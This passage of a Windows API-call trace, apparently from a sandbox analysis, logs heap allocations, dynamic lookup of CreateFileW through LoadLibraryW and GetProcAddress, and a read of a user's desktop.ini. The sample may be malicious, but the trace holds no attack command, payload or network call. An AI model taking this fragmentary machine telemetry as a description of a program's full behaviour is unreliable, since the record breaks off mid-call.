0x43c9de8 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0076.511] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0076.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.511] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0076.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0076.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0076.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0076.514] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0076.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.524] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.525] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca490, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.526] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.527] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 